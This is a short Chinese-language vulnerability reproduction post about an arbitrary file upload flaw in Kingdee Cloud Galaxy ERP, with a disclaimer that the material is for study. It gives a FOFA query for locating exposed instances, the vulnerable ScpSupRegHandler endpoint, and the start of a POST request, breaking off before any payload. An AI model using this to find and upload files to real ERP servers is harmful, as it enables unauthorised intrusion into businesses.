漏洞描述

金蝶云星空是一款云端企業資源管理（ERP）軟件，為企業提供財務管理、供應鏈管理以及業務流程管理等一體化解決方案。金蝶云·星空聚焦多組織，多利潤中心的大中型企業，以 “開放、標準、社交”三大特性為數字經濟時代的企業提供開放的 ERP 云平臺。服務涵蓋：財務、供應鏈、智能制造、阿米巴管理、全渠道營銷、電商、HR、企業互聯網服務，幫助企業實現數字化營銷新生態及管理重構等，提升企業數字化能力。金蝶云星空管理中心存在任意文件上傳漏洞。

免責聲明

技術文章僅供參考，任何個人和組織使用網絡應當遵守憲法法律，遵守公共秩序，尊重社會公德，不得利用網絡從事危害國家安全、榮譽和利益，未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失，均由使用者本人負責。本文所提供的工具僅用于學習，禁止用于其他！！

資產確定

fofa  icon_hash="-1629133697" && title=="金蝶云星空"

漏洞復現

漏洞鏈接：http://127.0.0.1/k3cloud/SRM/ScpSupRegHandler

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: